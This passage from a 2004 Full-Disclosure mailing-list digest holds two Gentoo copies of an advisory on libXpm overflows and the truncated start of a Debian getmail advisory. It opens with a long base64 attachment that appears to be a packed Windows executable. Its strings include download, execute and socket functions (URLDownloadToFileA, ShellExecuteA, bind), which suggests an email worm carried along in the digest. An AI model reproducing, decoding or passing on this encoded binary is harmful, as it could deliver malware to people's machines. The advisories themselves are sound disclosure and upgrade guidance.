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

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAMAAAAgAACADgAAAGAAAIAAAAAA

AAAAAAAAAAAAAAEAAQAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAFAAAACk8AAA6AIAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAABAAEAAAB4AACAAAAAAAAAAAAAAAAAAAABAAAAAACQAAAA

kPMAABQAAAAAAAAAAAAAAKDAAAAoAAAAIAAAAEAAAAABAAQAAAAAAIACAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAgAAAgAAAAICAAIAAAACAAIAAgIAAAICAgADAwMAAAAD/AAD/AAAA//8A

/wAAAP8A/wD//wAA////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHd3d3

d3d3AAAAAAAAAAAAB4iIiIiIhwAAAAAAAAAAAAc4iDM4iDcAAAAAAAAAAAAHs4MAA4OHAAAA

AAAAAAAAB/8w/7A4hwAAAAAAAAAAAAe4D7//A4cAAAAAAAAAAAAHgL//v/A3AAAAAAAAAAAA

Bw//v/+/AwAAAAAAAAAAAAf/v/+//7AAAAAAAAAAAAAHd3d3d3d3AAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////

////////////////////////////////////////////////////////////////////////

////////gAH//4AB//+AAf//gAH//4AB//+AAf//gAH//4AB//+AAf//gAH//4AB////////

//////////+IwwAAAAABAAEAICAQAAEABADoAgAAAQAAAAAAAAAAAAAAAADY9AAAgPQAAAAA

AAAAAAAAAAAAAOX0AACQ9AAAAAAAAAAAAAAAAAAA8vQAAJj0AAAAAAAAAAAAAAAAAAD89AAA

oPQAAAAAAAAAAAAAAAAAAAb1AACo9AAAAAAAAAAAAAAAAAAAEvUAALD0AAAAAAAAAAAAAAAA

AAAe9QAAuPQAAAAAAAAAAAAAAAAAACn1AADA9AAAAAAAAAAAAAAAAAAANPUAAMj0AAAAAAAA

AAAAAAAAAABA9QAA0PQAAAAAAAAAAAAAAAAAAAAAAAAAAAAATPUAAFr1AABq9QAAAAAAAHj1

AAAAAAAAhvUAAAAAAACQ9QAAAAAAAJ71AAAAAAAArvUAAAAAAAC49QAAAAAAAMz1AAAAAAAA

2PUAAAAAAADo9QAAAAAAAEtFUk5FTDMyLkRMTABhZHZhcGkzMi5kbGwAZ2RpMzIuZGxsAG9s

ZTMyLmRsbABTSEVMTDMyLmRsbABzaGx3YXBpLmRsbAB1cmxtb24uZGxsAHVzZXIzMi5kbGwA

d2luaW5ldC5kbGwAd3NvY2szMi5kbGwAAABMb2FkTGlicmFyeUEAAEdldFByb2NBZGRyZXNz

AABFeGl0UHJvY2VzcwAAAFJlZ0Nsb3NlS2V5AAAARGVsZXRlREMAAENvSW5pdGlhbGl6ZQAA

U2hlbGxFeGVjdXRlQQAAAFN0ckR1cEEAAABVUkxEb3dubG9hZFRvRmlsZUEAAHdzcHJpbnRm

QQAAAEludGVybmV0T3BlbkEAAABiaW5kAAAAAAAAAAAAAAAAAAAAAAAAarlfniVax2t8t1uc

XI5nvGp5vmA0phl0P2CpmCEjKEVBqsexWRhJEy9lsBmCX0zGshCuUxWpVyypnYW3Qwaqt3Mi

nUiiOXMxc1NAxRBYES91WHxPHXgVxauCOB1QopqyQFGLEX29fnyye2krvHYagMWrpnwLnFeK

RbSKEC22k0iydLtPpUpjcEy0J8axYYSte7IfjCWtrbjCDLFmF3GKQVcgwFAGmmJzQTIsbhOw

nsNBDAs3cU51pARZpYZ9badcbXlEmbIcEK89NbPDfLuNYyW0qjc1BohnbsG8S6UQRJ9siAEn

uG5WXRt/q1GLQpqjWKazVEzAqYajhAWxkkurtncHoaMwqDGatllGfUMiP00POSCCu0tcDWWZ

vGQpIrudlHZYCZYeUHNAfkO3rW+BXbpNmUdIC2ZPHCXBw1UAP4pULplSbJVSLxoOkwI5dVd5

RlOlDZlFS3IxP7phmZ2AXZaoDVZ1hgwatqMlIzkyOndumxN9D0BeNAKudyqiOQDFaypHh6m4

MgNHDloKbKEEkaV6tQ6voX4fFIO6tEI1KERFTXERW8YeWx8eq6uolSyfTJqDl3F2e30pG2A3

cp9/E4ZAtTRZx3oJNwGaHsBImzmylaRAfK6LiQ4Cr09hoLVaU3UVJjakqxMFb28Hv5dorjpI

jJJJT4ZFjwsCPEkcVGmqSYJgtcBaCKJKqDuXVza6e6NSQaEEmzoKBYs3XL6LDHSXIxlnjYFO

mqM+MqketDctiy2p

----------tthzhwewredcturxosqp--

--__--__--

Message: 15
Date: Mon, 27 Sep 2004 11:44:23 +0200
From: Thierry Carrez <koon () gentoo org>
Organization: Gentoo Linux
To: gentoo-announce () gentoo org
CC: bugtraq () securityfocus com, full-disclosure () lists netsys com,
   security-alerts () linuxsecurity com
Subject: [Full-disclosure] [ GLSA 200409-34 ] X.org, XFree86: Integer

and stack overflows in

 libXpm

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enigEA6620FABBD9968E5B2250AD
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Gentoo Linux Security Advisory                           GLSA

200409-34

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

http://security.gentoo.org/

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


  Severity: Normal
     Title: X.org, XFree86: Integer and stack overflows in libXpm
      Date: September 27, 2004
      Bugs: #64152
        ID: 200409-34

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


Synopsis
========

libXpm, the X Pixmap library that is a part of the X Window System,
contains multiple stack and integer overflows that may allow a
carefully-crafted XPM file to crash applications linked against
libXpm, potentially allowing the execution of arbitrary code.

Background
==========

XFree86 and X.org are both implementations of the X Window System.

Affected packages
=================

-------------------------------------------------------------------

     Package            /  Vulnerable  /                    Unaffected

-------------------------------------------------------------------

  1  x11-base/xorg-x11     < 6.7.0-r2                     *>= 6.7.0-r2
                            == 6.8.0                       >= 6.8.0-r1
  2  x11-base/xfree        < 4.3.0-r7                      >= 4.3.0-r7

-------------------------------------------------------------------

     # Package 2 [x11-base/xfree] only applies to ALPHA and x86 users.

     NOTE: Any packages listed without architecture tags apply to all
           architectures...

-------------------------------------------------------------------

     NOTE: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64,
           MIPS, PPC and SPARC architectures: XFree86 users on those
           architectures should switch to X.org rather than upgrading
           XFree86.

-------------------------------------------------------------------

     2 affected packages

-------------------------------------------------------------------


Description
===========

Chris Evans has discovered multiple integer and stack overflow
vulnerabilities in the X Pixmap library, libXpm, which is a part of

the

X Window System. These overflows can be exploited by the execution of

malicious XPM file, which can crash applications that are dependent on
libXpm.

Impact
======

A carefully-crafted XPM file could crash applications that are linked
against libXpm, potentially allowing the execution of arbitrary code
with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All X.org users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=x11-base/xorg-x11-6.7.0-r2"
    # emerge ">=x11-base/xorg-x11-6.7.0-r2"

All XFree86 users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=x11-base/xfree-4.3.0-r7"
    # emerge ">=x11-base/xfree-4.3.0-r7"

Note: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS,
PPC and SPARC architectures: XFree86 users on those architectures
should switch to X.org rather than upgrading XFree86.

References
==========

  [ 1 ] X.org Security Advisory

http://freedesktop.org/pipermail/xorg/2004-September/003196.html

  [ 2 ] X11R6.8.1 Release Notes

http://freedesktop.org/pipermail/xorg/2004-September/003172.html

  [ 3 ] CAN-2004-0687

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0687

  [ 4 ] CAN-2004-0688

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0688


Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200409-34.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

--------------enigEA6620FABBD9968E5B2250AD
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBV+EAvcL1obalX08RAus+AJ9Og0NSi/Uf/i3Rw0656rai7fKZMwCeJVWS
oxM9KaPNaz3q7G2WAXIvbrg=
=OQU0
-----END PGP SIGNATURE-----

--------------enigEA6620FABBD9968E5B2250AD--

--__--__--

Message: 16
Date: Mon, 27 Sep 2004 11:44:23 +0200
From: Thierry Carrez <koon () gentoo org>
Organization: Gentoo Linux
Cc: bugtraq () securityfocus com, full-disclosure () lists netsys com,
   security-alerts () linuxsecurity com
To: andreas.zuercher () telma ch
Subject: [Full-disclosure] [gentoo-announce] [ GLSA 200409-34 ] X.org,

XFree86: Integer and stack overflows in

 libXpm

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enigEA6620FABBD9968E5B2250AD
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Gentoo Linux Security Advisory                           GLSA

200409-34

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

http://security.gentoo.org/

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


  Severity: Normal
     Title: X.org, XFree86: Integer and stack overflows in libXpm
      Date: September 27, 2004
      Bugs: #64152
        ID: 200409-34

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


Synopsis
========

libXpm, the X Pixmap library that is a part of the X Window System,
contains multiple stack and integer overflows that may allow a
carefully-crafted XPM file to crash applications linked against
libXpm, potentially allowing the execution of arbitrary code.

Background
==========

XFree86 and X.org are both implementations of the X Window System.

Affected packages
=================

-------------------------------------------------------------------

     Package            /  Vulnerable  /                    Unaffected

-------------------------------------------------------------------

  1  x11-base/xorg-x11     < 6.7.0-r2                     *>= 6.7.0-r2
                            == 6.8.0                       >= 6.8.0-r1
  2  x11-base/xfree        < 4.3.0-r7                      >= 4.3.0-r7

-------------------------------------------------------------------

     # Package 2 [x11-base/xfree] only applies to ALPHA and x86 users.

     NOTE: Any packages listed without architecture tags apply to all
           architectures...

-------------------------------------------------------------------

     NOTE: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64,
           MIPS, PPC and SPARC architectures: XFree86 users on those
           architectures should switch to X.org rather than upgrading
           XFree86.

-------------------------------------------------------------------

     2 affected packages

-------------------------------------------------------------------


Description
===========

Chris Evans has discovered multiple integer and stack overflow
vulnerabilities in the X Pixmap library, libXpm, which is a part of

the

X Window System. These overflows can be exploited by the execution of

malicious XPM file, which can crash applications that are dependent on
libXpm.

Impact
======

A carefully-crafted XPM file could crash applications that are linked
against libXpm, potentially allowing the execution of arbitrary code
with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All X.org users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=x11-base/xorg-x11-6.7.0-r2"
    # emerge ">=x11-base/xorg-x11-6.7.0-r2"

All XFree86 users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=x11-base/xfree-4.3.0-r7"
    # emerge ">=x11-base/xfree-4.3.0-r7"

Note: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS,
PPC and SPARC architectures: XFree86 users on those architectures
should switch to X.org rather than upgrading XFree86.

References
==========

  [ 1 ] X.org Security Advisory

http://freedesktop.org/pipermail/xorg/2004-September/003196.html

  [ 2 ] X11R6.8.1 Release Notes

http://freedesktop.org/pipermail/xorg/2004-September/003172.html

  [ 3 ] CAN-2004-0687

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0687

  [ 4 ] CAN-2004-0688

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0688


Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200409-34.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

--------------enigEA6620FABBD9968E5B2250AD
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBV+EAvcL1obalX08RAus+AJ9Og0NSi/Uf/i3Rw0656rai7fKZMwCeJVWS
oxM9KaPNaz3q7G2WAXIvbrg=
=OQU0
-----END PGP SIGNATURE-----

--------------enigEA6620FABBD9968E5B2250AD--

--__--__--

Message: 17
Date: Mon, 27 Sep 2004 12:34:05 +0200 (CEST)
Reply-To: full-disclosure () lists netsys com
From: debian-security-announce () lists debian org
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] [SECURITY] [DSA 553-1] New getmail packages

fix root compromise


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

-

------------------------------------------------------------------------
--

Debian Security Advisory DSA 553-1

security () debian org

http://www.debian.org/security/                             Martin

Schulze

September 27th, 2004

http://www.debian.org/security/faq

------------------------------------------------------------------------
--


Package        : getmail
Vulnerability  : symlink vulnerability
Problem-Type   : local
Debian-specific: no
CVE ID         : CAN-2004-0880 CAN-2004-0881
Debian Bug     : 272561

A security problem has been discovered in getmail, a POP3 and APOP
mail gatherer and forwarder.  An attacker with a shell account on the
victims host could utilise getmail to overwrite arbitrary files when
it is running as root.

For the stable distribution (woody) this problem has been fixed in
version 2.3.7-2.

For the unstable distribution (sid) this problem has been fixed in
version 3.2.5-1.

We recommend that you upgrade your getmail package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
